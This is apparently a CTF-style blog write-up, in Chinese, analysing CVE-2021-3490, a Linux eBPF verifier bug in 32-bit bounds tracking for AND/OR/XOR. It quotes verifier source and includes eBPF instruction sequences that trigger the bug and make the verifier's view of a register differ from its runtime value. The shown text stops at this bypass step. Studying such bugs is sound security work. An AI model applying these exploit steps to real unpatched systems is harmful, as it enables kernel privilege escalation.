ebpf-pwn-A-Love-Story

2021-08-16

字数统计: 9.7k字 | 阅读时长≈ 51分

上个月刚出的一道ebpf提权的题目，改编自cve-2021-3490。漏洞点和之前分析的ebpf漏洞很相似，所以赶紧分析学习。

漏洞简介

The eBPF ALU32 bounds tracking for bitwise ops (AND, OR and XOR) in the Linux kernel did not properly update 32-bit bounds, which could be turned into out of bounds reads and writes in the Linux kernel and therefore, arbitrary code execution. This issue was fixed via commit 049c4e13714e (“bpf: Fix alu32 const subreg bound tracking on bitwise operations”) (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. The AND/OR issues were introduced by commit 3f50f132d840 (“bpf: Verifier, do explicit ALU32 bounds tracking”) (5.7-rc1) and the XOR variant was introduced by 2921c90d4718 (“bpf:Fix a verifier failure with xor”) ( 5.10-rc1).

漏洞描述说明是ebpf中verifier中ALU32指令种类中的 bit位操作AND、OR、XOR没有进行32位比特的边界检查，导致可以越界读写，最终导致任意代码执行。

受影响的内核版本有 v5.12.4，v5.11.21，v5.10.37。其是在 3f50f132d840 和 2921c90d4718中引入。

总体来说，还是和之前的ebpf漏洞的原因类似，都是由于在bpf_check中对于ebpf指令检查存在漏洞，导致可以绕过检查，从而执行恶意代码。

漏洞分析

基础知识

结构体

在cve-2020-8835中提到过ebpf寄存器类型的数据结构如下：

struct bpf_reg_state {
	/* Ordering of fields matters.  See states_equal() */
	enum bpf_reg_type type;
	/* Fixed part of pointer offset, pointer types only */
	s32 off;
	union {
		/* valid when type == PTR_TO_PACKET */
		int range;

		/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
		 *   PTR_TO_MAP_VALUE_OR_NULL
		 */
		struct bpf_map *map_ptr;

		/* for PTR_TO_BTF_ID */
		struct {
			struct btf *btf;
			u32 btf_id;
		};

		u32 mem_size; /* for PTR_TO_MEM | PTR_TO_MEM_OR_NULL */

		/* Max size from any of the above. */
		struct {
			unsigned long raw1;
			unsigned long raw2;
		} raw;
	};
	/* For PTR_TO_PACKET, used to find other pointers with the same variable
	 * offset, so they can share range knowledge.
	 * For PTR_TO_MAP_VALUE_OR_NULL this is used to share which map value we
	 * came from, when one is tested for != NULL.
	 * For PTR_TO_MEM_OR_NULL this is used to identify memory allocation
	 * for the purpose of tracking that it's freed.
	 * For PTR_TO_SOCKET this is used to share which pointers retain the
	 * same reference to the socket, to determine proper reference freeing.
	 */
	u32 id;
	/* PTR_TO_SOCKET and PTR_TO_TCP_SOCK could be a ptr returned
	 * from a pointer-cast helper, bpf_sk_fullsock() and
	 * bpf_tcp_sock().
	 *
	 * Consider the following where "sk" is a reference counted
	 * pointer returned from "sk = bpf_sk_lookup_tcp();":
	 *
	 * 1: sk = bpf_sk_lookup_tcp();
	 * 2: if (!sk) { return 0; }
	 * 3: fullsock = bpf_sk_fullsock(sk);
	 * 4: if (!fullsock) { bpf_sk_release(sk); return 0; }
	 * 5: tp = bpf_tcp_sock(fullsock);
	 * 6: if (!tp) { bpf_sk_release(sk); return 0; }
	 * 7: bpf_sk_release(sk);
	 * 8: snd_cwnd = tp->snd_cwnd;  // verifier will complain
	 *
	 * After bpf_sk_release(sk) at line 7, both "fullsock" ptr and
	 * "tp" ptr should be invalidated also.  In order to do that,
	 * the reg holding "fullsock" and "sk" need to remember
	 * the original refcounted ptr id (i.e. sk_reg->id) in ref_obj_id
	 * such that the verifier can reset all regs which have
	 * ref_obj_id matching the sk_reg->id.
	 *
	 * sk_reg->ref_obj_id is set to sk_reg->id at line 1.
	 * sk_reg->id will stay as NULL-marking purpose only.
	 * After NULL-marking is done, sk_reg->id can be reset to 0.
	 *
	 * After "fullsock = bpf_sk_fullsock(sk);" at line 3,
	 * fullsock_reg->ref_obj_id is set to sk_reg->ref_obj_id.
	 *
	 * After "tp = bpf_tcp_sock(fullsock);" at line 5,
	 * tp_reg->ref_obj_id is set to fullsock_reg->ref_obj_id
	 * which is the same as sk_reg->ref_obj_id.
	 *
	 * From the verifier perspective, if sk, fullsock and tp
	 * are not NULL, they are the same ptr with different
	 * reg->type.  In particular, bpf_sk_release(tp) is also
	 * allowed and has the same effect as bpf_sk_release(sk).
	 */
	u32 ref_obj_id;
	/* For scalar types (SCALAR_VALUE), this represents our knowledge of
	 * the actual value.
	 * For pointer types, this represents the variable part of the offset
	 * from the pointed-to object, and is shared with all bpf_reg_states
	 * with the same id as us.
	 */
	struct tnum var_off;
	/* Used to determine if any memory access using this register will
	 * result in a bad access.
	 * These refer to the same value as var_off, not necessarily the actual
	 * contents of the register.
	 */
	s64 smin_value; /* minimum possible (s64)value */
	s64 smax_value; /* maximum possible (s64)value */
	u64 umin_value; /* minimum possible (u64)value */
	u64 umax_value; /* maximum possible (u64)value */
	s32 s32_min_value; /* minimum possible (s32)value */
	s32 s32_max_value; /* maximum possible (s32)value */
	u32 u32_min_value; /* minimum possible (u32)value */
	u32 u32_max_value; /* maximum possible (u32)value */
	/* parentage chain for liveness checking */
	struct bpf_reg_state *parent;
	/* Inside the callee two registers can be both PTR_TO_STACK like
	 * R1=fp-8 and R2=fp-8, but one of them points to this function stack
	 * while another to the caller's stack. To differentiate them 'frameno'
	 * is used which is an index in bpf_verifier_state->frame[] array
	 * pointing to bpf_func_state.
	 */
	u32 frameno;
	/* Tracks subreg definition. The stored value is the insn_idx of the
	 * writing insn. This is safe because subreg_def is used before any insn
	 * patching which only happens after main verification finished.
	 */
	s32 subreg_def;
	enum bpf_reg_liveness live;
	/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
	bool precise;
};

其中，比较重点关注的变量如下：

smin_value、smax_value：表示64位有符号的值的可能最大最小值边界
umin_value、umax_value：表示64位无符号的值的可能最大最小值边界
s32_min_value、s32_max_value：表示32位有符号的值可能最大最小值边界
u32_min_value、u32_max_value：表示32位无符号的值的可能最大最小值边界

其中，这个寄存器中具体的值，会用如下变量进行表示：

struct tnum {
	u64 value;
	u64 mask;
};

这里的 value&mask表示这个寄存器中可以确定的值。

ALU 检测

之前对ebpf check逻辑有过分析，这里我们重点分析一下对于ALU操作类型的检查，以下面的指令进行一个大概的说明：

*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);

首先将alu->limit的值赋值给REG_AX寄存器
将REG_AX的值与off_reg的值相减，如果off_reg>REG_AX，则设置REG_AX的最高符号位，表示负数
将REG_AX与off_reg的值相异或，如果二者符号相反，则会设置REG_AX的符号位
BPF_NEG会修改REG_AX的符号位，如果REG_AX为正，则设置后REG_AX为负，如果REG_AX为负，则设置后为正
BPF_ARSH会将REG_AX向右移63位，这个操作相当于用REG_AX符号位设置REG_AX的值，如果为负则全为1，如果为正则全为0
基于上面的结果，BPF_AND要么使得off_reg全为0，要么使得off_reg不变

总结：上面的操作中，如果off_reg的值大于REG_AX，或者off_reg与REG_AX的符号相反，则最终的结果是off_reg的值全为0

漏洞分析

具体的cve信息，可以看这个报告。

在ebpf对寄存器计算的指令中，分为64位和32位操作两部分。64位指令会对寄存器的64位全部进行操作，32位指令只会对寄存器的低32位进行操作。因此，bpf_check也包含了对32位指令的检查。

这里首先看64位指令时的检查，位于adjust_scalar_min_max_vals

*
/* WARNING: This function does calculations on 64-bit values, but  * the actual execution may occur on 32-bit values. Therefore,      * things like bitshifts need extra checks in the 32-bit case.
*/
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                                      struct bpf_insn *insn,
                                      struct bpf_reg_state 
                                                  *dst_reg,
                                      struct bpf_reg_state src_reg)
{
...
        case BPF_AND:
                dst_reg->var_off = tnum_and(dst_reg->var_off,       
                src_reg.var_off);
  							//32位
                scalar32_min_max_and(dst_reg, &src_reg);
                //64位
  							scalar_min_max_and(dst_reg, &src_reg);
                break;
        case BPF_OR:
                dst_reg->var_off = tnum_or(dst_reg->var_off,  
                src_reg.var_off);
                scalar32_min_max_or(dst_reg, &src_reg);
                scalar_min_max_or(dst_reg, &src_reg);
                break;
        case BPF_XOR:
                dst_reg->var_off = tnum_xor(dst_reg->var_off,   
                src_reg.var_off);
                scalar32_min_max_xor(dst_reg, &src_reg);
                scalar_min_max_xor(dst_reg, &src_reg);
                break;
                
...
} 

struct tnum tnum_and(struct tnum a, struct tnum b)
{
	u64 alpha, beta, v;

	alpha = a.value | a.mask;
	beta = b.value | b.mask;
	v = a.value & b.value;
	return TNUM(v, alpha & beta & ~v);
}

而这个cve的漏洞点位于这个函数的32位处理函数scalar32_min_max_and处，其中的BPF_AND\ BPF_OR\ BPF_XOR三类操作有问题：

static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
				 struct bpf_reg_state *src_reg)
{
	bool src_known = tnum_subreg_is_const(src_reg->var_off);
	bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
	struct tnum var32_off = tnum_subreg(dst_reg->var_off);
	s32 smin_val = src_reg->s32_min_value;
	u32 umax_val = src_reg->u32_max_value;

	/* Assuming scalar64_min_max_and will be called so its safe
	 * to skip updating register for known 32-bit case.
	 */
  //如果src_reg和dst_reg的值都已经已知，那么则直接返回
	if (src_known && dst_known)
		return;

	/* We get our minimum from the var_off, since that's inherently
	 * bitwise.  Our maximum is the minimum of the operands' maxima.
	 */
	dst_reg->u32_min_value = var32_off.value;
	dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);
	if (dst_reg->s32_min_value < 0 || smin_val < 0) {
		/* Lose signed bounds when ANDing negative numbers,
		 * ain't nobody got time for that.
		 */
		dst_reg->s32_min_value = S32_MIN;
		dst_reg->s32_max_value = S32_MAX;
	} else {
		/* ANDing two positives gives a positive, so safe to
		 * cast result into s64.
		 */
		dst_reg->s32_min_value = dst_reg->u32_min_value;
		dst_reg->s32_max_value = dst_reg->u32_max_value;
	}

}

上面的函数大概流程如下：

通过tnum_subreg_is_const函数来判断是否能确定src_reg和dst_reg两个寄存器低32位的值
然后通过tnum_subreg函数来获取dst_reg->var_off的低32位值，并且分别获取src_reg的s32_min_value和u32_max_value
如果src_reg和dst_reg的值都已经确定，那么则直接返回，不进行下面的更新操作
如果不确定，则会使用var32_off的值来更新dst_reg的u32_min_value和u32_max_value
在更新dst_reg的s32_min_value和s32_max_value时，需要分同时为正或同时为负的情况，如果同为负则用src_reg的最大最小值，如果为正则用dst_reg的u32_min_value和u32_max_value更新

而64位对应的操作函数如下：

static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
			       struct bpf_reg_state *src_reg)
{
	bool src_known = tnum_is_const(src_reg->var_off);
	bool dst_known = tnum_is_const(dst_reg->var_off);
	s64 smin_val = src_reg->smin_value;
	u64 umax_val = src_reg->umax_value;

	if (src_known && dst_known) {
		__mark_reg_known(dst_reg, dst_reg->var_off.value);
		return;
	}

	/* We get our minimum from the var_off, since that's inherently
	 * bitwise.  Our maximum is the minimum of the operands' maxima.
	 */
	dst_reg->umin_value = dst_reg->var_off.value;
	dst_reg->umax_value = min(dst_reg->umax_value, umax_val);
	if (dst_reg->smin_value < 0 || smin_val < 0) {
		/* Lose signed bounds when ANDing negative numbers,
		 * ain't nobody got time for that.
		 */
		dst_reg->smin_value = S64_MIN;
		dst_reg->smax_value = S64_MAX;
	} else {
		/* ANDing two positives gives a positive, so safe to
		 * cast result into s64.
		 */
		dst_reg->smin_value = dst_reg->umin_value;
		dst_reg->smax_value = dst_reg->umax_value;
	}
	/* We may learn something more from the var_off */
	__update_reg_bounds(dst_reg);
}

在64位函数中，可以看到其就算确定了src_reg和dst_reg的值，也会调用__mark_reg_known函数再进行一次设置：

/* Mark the unknown part of a register (variable offset or scalar value) as
 * known to have the value @imm.
 */
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
	/* Clear id, off, and union(map_ptr, range) */
	memset(((u8 *)reg) + sizeof(reg->type), 0,
	       offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
	___mark_reg_known(reg, imm);
}

/* This helper doesn't clear reg->id */
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
	reg->var_off = tnum_const(imm);
	reg->smin_value = (s64)imm;
	reg->smax_value = (s64)imm;
	reg->umin_value = imm;
	reg->umax_value = imm;

	reg->s32_min_value = (s32)imm;
	reg->s32_max_value = (s32)imm;
	reg->u32_min_value = (u32)imm;
	reg->u32_max_value = (u32)imm;
}

总结：32位和64位的区别，就在于当src_reg和dst_reg的值是确定时。32位不会再做任何赋值操作，而64位还会进行一个赋值检查操作。

在adjust_scalar_min_max_vals函数中，最后会执行如下三个函数：

if (alu32)
	zext_32_to_64(dst_reg);

__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
return 0;

这三个函数都会对dst_reg进行操作：

static void __update_reg_bounds(struct bpf_reg_state *reg)
{
	__update_reg32_bounds(reg);
	__update_reg64_bounds(reg);
}

static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
	struct tnum var32_off = tnum_subreg(reg->var_off);

	/* min signed is max(sign bit) | min(other bits) */
	reg->s32_min_value = max_t(s32, reg->s32_min_value,
			var32_off.value | (var32_off.mask & S32_MIN));
	/* max signed is min(sign bit) | max(other bits) */
	reg->s32_max_value = min_t(s32, reg->s32_max_value,
			var32_off.value | (var32_off.mask & S32_MAX));
	reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
	reg->u32_max_value = min(reg->u32_max_value,
				 (u32)(var32_off.value | var32_off.mask));
}

static void __update_reg64_bounds(struct bpf_reg_state *reg)
{
	/* min signed is max(sign bit) | min(other bits) */
	reg->smin_value = max_t(s64, reg->smin_value,
				reg->var_off.value | (reg->var_off.mask & S64_MIN));
	/* max signed is min(sign bit) | max(other bits) */
	reg->smax_value = min_t(s64, reg->smax_value,
				reg->var_off.value | (reg->var_off.mask & S64_MAX));
	reg->umin_value = max(reg->umin_value, reg->var_off.value);
	reg->umax_value = min(reg->umax_value,
			      reg->var_off.value | reg->var_off.mask);
}

__update_reg_bounds函数，也分为32位和64位。其总体逻辑如下：

从reg->s32_min_value和var32_off.value|(var32_off.mask&S32_MIN)中选取最大的值，赋值给reg->s32_min_value
从reg->s32_max_value和var32_off.value | (var32_off.mask & S32_MAX)中选取最小的值，赋值给reg->s32_max_value
从reg->u32_min_value和var32_off.value | (var32_off.mask & S32_MAX)中选取最大的值，赋值给reg->u32_min_value
从reg->u32_max_value和(u32)(var32_off.value | var32_off.mask)中选取最小的值，赋值给reg->u32_max_value
64位同逻辑

static void __reg_deduce_bounds(struct bpf_reg_state *reg)
{
	__reg32_deduce_bounds(reg);
	__reg64_deduce_bounds(reg);
}


/* Uses signed min/max values to inform unsigned, and vice-versa */
static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
	/* Learn sign from signed bounds.
	 * If we cannot cross the sign boundary, then signed and unsigned bounds
	 * are the same, so combine.  This works even in the negative case, e.g.
	 * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
	 */
	if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) {
		reg->s32_min_value = reg->u32_min_value =
			max_t(u32, reg->s32_min_value, reg->u32_min_value);
		reg->s32_max_value = reg->u32_max_value =
			min_t(u32, reg->s32_max_value, reg->u32_max_value);
		return;
	}
	/* Learn sign from unsigned bounds.  Signed bounds cross the sign
	 * boundary, so we must be careful.
	 */
	if ((s32)reg->u32_max_value >= 0) {
		/* Positive.  We can't learn anything from the smin, but smax
		 * is positive, hence safe.
		 */
		reg->s32_min_value = reg->u32_min_value;
		reg->s32_max_value = reg->u32_max_value =
			min_t(u32, reg->s32_max_value, reg->u32_max_value);
	} else if ((s32)reg->u32_min_value < 0) {
		/* Negative.  We can't learn anything from the smax, but smin
		 * is negative, hence safe.
		 */
		reg->s32_min_value = reg->u32_min_value =
			max_t(u32, reg->s32_min_value, reg->u32_min_value);
		reg->s32_max_value = reg->u32_max_value;
	}
}

static void __reg64_deduce_bounds(struct bpf_reg_state *reg)
{
	/* Learn sign from signed bounds.
	 * If we cannot cross the sign boundary, then signed and unsigned bounds
	 * are the same, so combine.  This works even in the negative case, e.g.
	 * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
	 */
	if (reg->smin_value >= 0 || reg->smax_value < 0) {
		reg->smin_value = reg->umin_value = max_t(u64, reg->smin_value,
							  reg->umin_value);
		reg->smax_value = reg->umax_value = min_t(u64, reg->smax_value,
							  reg->umax_value);
		return;
	}
	/* Learn sign from unsigned bounds.  Signed bounds cross the sign
	 * boundary, so we must be careful.
	 */
	if ((s64)reg->umax_value >= 0) {
		/* Positive.  We can't learn anything from the smin, but smax
		 * is positive, hence safe.
		 */
		reg->smin_value = reg->umin_value;
		reg->smax_value = reg->umax_value = min_t(u64, reg->smax_value,
							  reg->umax_value);
	} else if ((s64)reg->umin_value < 0) {
		/* Negative.  We can't learn anything from the smax, but smin
		 * is negative, hence safe.
		 */
		reg->smin_value = reg->umin_value = max_t(u64, reg->smin_value,
							  reg->umin_value);
		reg->smax_value = reg->umax_value;
	}
}

__reg_deduce_bounds函数，总体逻辑如下：

如果reg->smin_value>=0 || reg->smax_value<0，即reg的smin_Value和smax_value的是同号时，从reg->smin_value和reg->umin_value中取最大值，赋值给reg->smin_value；从reg->smax_value和reg->umax_value中取最小值赋值给reg->umin_value
如果smin_value和smax_value不是同号，且(s64)reg->umax_value>=0，即reg的最大值是正数时，说明umin_value也是正数，所以直接将umin_value赋值给reg->smin_value，从reg->smax_value和reg->umax_value中选择最小值赋值给smax_value
如果(s64)reg->umin_value<0，即reg的最小值是负数时，说明umax_value也是负数，所以直接将umax_value赋值给reg->smax_value；从reg->smin_value和reg->umin_value中选择最大值赋值给reg->smin_value
32位同理

/* Attempts to improve var_off based on unsigned min/max information */
static void __reg_bound_offset(struct bpf_reg_state *reg)
{
	struct tnum var64_off = tnum_intersect(reg->var_off,
					       tnum_range(reg->umin_value,
							  reg->umax_value));
	struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
						tnum_range(reg->u32_min_value,
							   reg->u32_max_value));

	reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}

#define TNUM(_v, _m)	(struct tnum){.value = _v, .mask = _m}

/* Note that if a and b disagree - i.e. one has a 'known 1' where the other has
 * a 'known 0' - this will return a 'known 1' for that bit.
 */
//取a.value|b.value和a.mask|b.mask的值
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
	u64 v, mu;

	v = a.value | b.value;
	mu = a.mask & b.mask;
	return TNUM(v & ~mu, mu);
}
//
struct tnum tnum_range(u64 min, u64 max)
{
	u64 chi = min ^ max, delta;
  //从右往左第一个为1的bit是哪一位，从1开始数
  u8 bits = fls64(chi);

	/* special case, needed because 1ULL << 64 is undefined */
	if (bits > 63)
		return tnum_unknown;
	/* e.g. if chi = 4, bits = 3, delta = (1<<3) - 1 = 7.
	 * if chi = 0, bits = 0, delta = (1<<0) - 1 = 0, so we return
	 *  constant min (since min == max).
	 */
	delta = (1ULL << bits) - 1;
	return TNUM(min & ~delta, delta);
}

struct tnum tnum_or(struct tnum a, struct tnum b)
{
	u64 v, mu;

	v = a.value | b.value;
	mu = a.mask | b.mask;
	return TNUM(v, mu & ~v);
}

__reg_bound_offset函数，在之前的cve-2020-8835中详细分析过，这里简要说明：

首先调用tnum_intersect函数，参数为reg->var_off和tnum_range(reg->umin_value, reg->umax_value)，其作用是计算传入的两个值的 a.value|b.value和a.mask|b.mask的值
- 而tnum_range函数的作用是返回一个无符号数的范围
对32位和64位都使用tnum_intersect进行了计算，最终得到该寄存器的可能值范围

示例说明：

这里我们以一个样例指令，来详细说明一下上述步骤的影响：

1	BPF_ALU64_REG(BPF_AND, R2, R3)

R2的值为：var_off = {mask = 0xFFFFFFFF00000000; value = 0x1}，可以看到其低32位的值是确定的为0x1，所以其32位的边界也全部为0x1，高32位的值是不确定的
R3的值为：var_off = {mask = 0x0; value = 0x100000002}，其值是确定的为0x100000002。

那么这条指令的执行步骤如下：

首先执行adjust_scalar_min_max_vals函数，随后会进入tnum_and函数，该函数返回，R2.var_off = {mask = 0x100000000; value=0x0}，因为R2.var_off.value & R3.var_off.value = 0x1&0x100000002 = 0x0，但是由于R2的高32位是不确定，所以最终R2.var_off.mask = 0x100000000
然后执行scalar32_min_max_and，这个函数的主要作用就是检查寄存器32位的值的范围，这里由于R2和R3两个寄存器的低32位的值都是确定的，所以经过这个函数后scalar32_min_max_and这两个寄存器并不会有改变
随后执行__update_reg_bounds，这个函数会对R2的值做相应修改，这里会将R2.u32_max_value=0x0，因为R2.var_off.value=0<R2.u32_max_value=1，这里会将R2.u32_min_value=0x1，因为R2.var_off.value=0 < R2.u32_min_value=0x1
最后执行__reg_bound_offset函数，也不会改变R2的属性

经过上面的流程，我们成功使得reg2在BPF_check时，其属性变为：{u,s}32_max_value = 0 < {u,s}32_min_value = 1

漏洞利用

Dos

这里Dos攻击的思路，其实在cve-2020-8835分析中我提到过，其实算是一种失败的利用方式，但是这种方式确实会让eBPF陷入死循环，从而干扰正常程序执行。

在bpf_check中，当验证条件跳转时，其首先会根据寄存器的边界来判断其是否会对多个分支都进行跳转。如果能够唯一确定跳转一条分支，那么则会省去对另外分支的检查。

1	BPF_JMP32_IMM(BPF_JGE, EXPLOIT_REG, 1, 5)

如果使用如上指令，由于在前面已经构造了EXPLOIT_REG寄存器为{mask=0xffffffff00000000; value=0x1}。因此执行这条指令后，会跳转到偏移5个指令处继续执行。

static int is_branch32_taken(struct bpf_reg_state *reg, u32 val, u8 opcode)
{
        struct tnum subreg = tnum_subreg(reg->var_off);
        s32 sval = (s32)val;


        switch (opcode) {
...
        case BPF_JGE:
                if (reg->u32_min_value >= val)
                       return 1;
                else if (reg->u32_max_value < val)
                        return 0;
..
}

而对于BPF_JGE跳转，bpf_check会在is_branch32_taken中采用对reg->u32_min_value判断的方法来确定另一条分支是否会被执行。这里由于EXPLOIT_REG.u32_min_value = 0x1，所以这里会返回0x1。也就是另一条分支不会被执行，也就是该分支不会被检查。

然而，由于EXPLOIT_REG寄存器的值在运行过程中，是可以被我们控制的，所以在运行时是可以跳转到另一条分支执行。

/* The verifier does more data flow analysis than llvm and will not
 * explore branches that are dead at run time. Malicious programs  
 * can have dead code too. Therefore replace all dead at-run-time  
 * code with 'ja -1'.
 *
 * Just nops are not optimal, e.g. if they would sit at the end of 
 * the program and through another bug we would manage to jump     
 * there, then we'd execute beyond program memory otherwise.   
 * Returning exception code also wouldn't work since we can have   
 * subprogs where the dead code could be located.
 */
static void sanitize_dead_code(struct bpf_verifier_env *env)
{
    struct bpf_insn_aux_data *aux_data = env->insn_aux_data;
    struct bpf_insn trap = BPF_JMP_IMM(BPF_JA, 0, 0, -1);
    struct bpf_insn *insn = env->prog->insnsi;
    const int insn_cnt = env->prog->len;
    int i;
    
    for (i = 0; i < insn_cnt; i++) {
            if (aux_data[i].seen)
                   continue;
            memcpy(insn + i, &trap, sizeof(trap));
    }
}

但是，这种思路在之前就已经解释过在较新的ebpf中都已经不可能实现。

原因是，ebpf程序对于在ebpf_check中确定的永远不会执行的死分支指令全部用了trap指令进行了替代。如果我们在真正运行时，去执行这个死分支，那么只会使得系统陷入trap，从而发生了Dos攻击。

绕过检查

        BPF_LD_MAP_FD(BPF_REG_9, mapfd),					// r9 = map_fd
// (1) trigger vulnerability
        BPF_LD_IMM64(BPF_REG_8, 0x1),							// r8 = 0x1
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),		// r8 <<= 32     	0x10000 0000
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2),			// r8 += 2       	0x10000 0002

        BPF_MAP_GET(0, BPF_REG_5),								// r5 = *(u64 *)(r0 +0)
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_5),			// (bf) r6 = r5

        BPF_LD_IMM64(BPF_REG_2, 0xFFFFFFFF),			// r2 = 0xffffffff
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32),			// r2 <<= 32 	->	r2=0xFFFFFFFF00000000
        BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_2),	// r6 &= r2   高32位 unknown, 低32位known 为0
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),			// r6 += 1   mask = 0xFFFFFFFF00000000, value = 0x1
        
				// trigger the vulnerability
        BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), 	// r6 &= r8 	r6: u32_min_value=1, u32_max_value=0

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),			// r6 += 1 		r6 : u32_max_value = 1, u32_min_value = 2, var_off = {0x100000000; value = 0x1}
        BPF_JMP32_IMM(BPF_JLE, BPF_REG_5, 1, 1),		// if w5 <= 0x1 goto pc+1   r5: u32_min_value = 0, u32_max_value = 1, var_off = {mask = 0xFFFFFFFF00000001; value = 0x0}
				BPF_EXIT_INSN(),

				BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_5),	// 25: (0f) r6 += r5 		r6: verify:2   fact:1 
				BPF_MOV32_REG(BPF_REG_6, BPF_REG_6),			// 26: (bc) w6 = w6 		对64位进行截断，只看32位部分
				BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1),			// 		r6: verify:0   fact:1

上面的注释已经十分详细，这里就大概讲讲流程。

构造 r8 = {mask = 0x0; value = 0x100000002}

        BPF_LD_MAP_FD(BPF_REG_9, mapfd),					// r9 = map_fd
// (1) trigger vulnerability
        BPF_LD_IMM64(BPF_REG_8, 0x1),							// r8 = 0x1
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),		// r8 <<= 32     	0x10000 0000
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2),			// r8 += 2       	0x10000 0002

构造r6 = {mask = 0xFFFFFFFF00000000, value = 0x1}

BPF_MAP_GET(0, BPF_REG_5),								// r5 = *(u64 *)(r0 +0)
BPF_MOV64_REG(BPF_REG_6, BPF_REG_5),			// (bf) r6 = r5

BPF_LD_IMM64(BPF_REG_2, 0xFFFFFFFF),			// r2 = 0xffffffff
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32),			// r2 <<= 32 	->	r2=0xFFFFFFFF00000000
BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_2),	// r6 &= r2   高32位 unknown, 低32位known 为0
BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),			// r6 += 1   mask = 0xFFFFFFFF00000000, value = 0x1

触发漏洞，这里使得r6 = {u,s}32_max_value = 0 < {u,s}32_min_value = 1

1 2	// trigger the vulnerability BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), // r6 &= r8 r6: u32_min_value=1, u32_max_value=0

检查绕过(重点)

1
2
3

BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_5),	// r6 += r5 		r6: verify:2   fact:1 
BPF_MOV32_REG(BPF_REG_6, BPF_REG_6),			// w6 = w6 		对64位进行截断，只看32位部分
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1),			// 	verify:0   fact:1

这里先将 r6+=1，使得 r6={u32_max_value = 1, u32_min_value = 2, var_off = {0x100000000; value = 0x1}}
然后构造r5 ={u32_min_value = 0, u32_max_value = 1, var_off = {mask = 0xFFFFFFFF00000001; value = 0x0}}

最后将 r6 与 r5 相加

static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                                      struct bpf_insn *insn,
                                      struct bpf_reg_state 
                                             *dst_reg,
                                      struct bpf_reg_state src_reg)
{
  ...
    switch (opcode) {
        case BPF_ADD:
            scalar32_min_max_add(dst_reg, &src_reg);
            scalar_min_max_add(dst_reg, &src_reg);
            dst_reg->var_off = tnum_add(dst_reg->var_off, 
                                        src_reg.var_off);
            break;

...
}

static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,
                                 struct bpf_reg_state *src_reg)
{
    s32 smin_val = src_reg->s32_min_value;
    s32 smax_val = src_reg->s32_max_value;
    u32 umin_val = src_reg->u32_min_value;
    u32 umax_val = src_reg->u32_max_value;

...
    if (dst_reg->u32_min_value + umin_val < umin_val ||
        dst_reg->u32_max_value + umax_val < umax_val) {
            dst_reg->u32_min_value = 0;
            dst_reg->u32_max_value = U32_MAX;
        } else {
            dst_reg->u32_min_value += umin_val;
            dst_reg->u32_max_value += umax_val;
        }
}

在经过scalar32_min_max_add函数时，r6 = {u32_min_value = 2, u32_max_value = 2}

在经过 tnum_add后，此时由于r6的低位确定为1，而 r5的值不能确定为 1还是0，所以得到的结果 r6的值也就不能确定是 2还是 1，所以使得 r6={u32_min_value = 2, u32_max_value = 2, var_off = {mask=0xFFFFFFFF00000003; value = 0x0}}

在__update_reg32_bounds函数中，由于reg->u32_min_value=0x2 > var32_off.value=0，所以 reg->u32_min_value=0x2不变。由于reg->u32_max_value = 0x2 < (var32_off.value | var32_off.mask)=(0x0|0x00000003)=0x3，所以reg->u32_max_value=0x2不变。

reg->u32_min_value = max_t(u32, reg->u32_min_value,
                          (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
                         (u32)(var32_off.value | var32_off.mask));

随后执行__reg_deduce_bounds(dst_reg)，由于r6的有符号和无符号边界是相同的，所以不会做改变。

最后执行__reg_bound_offset，最终，得到r6 = {u,s}32_min_value = {u,s}32_max_value = 2, var_off = {mask = 0xFFFFFFFF00000000; value = 0x2}

1
2
3

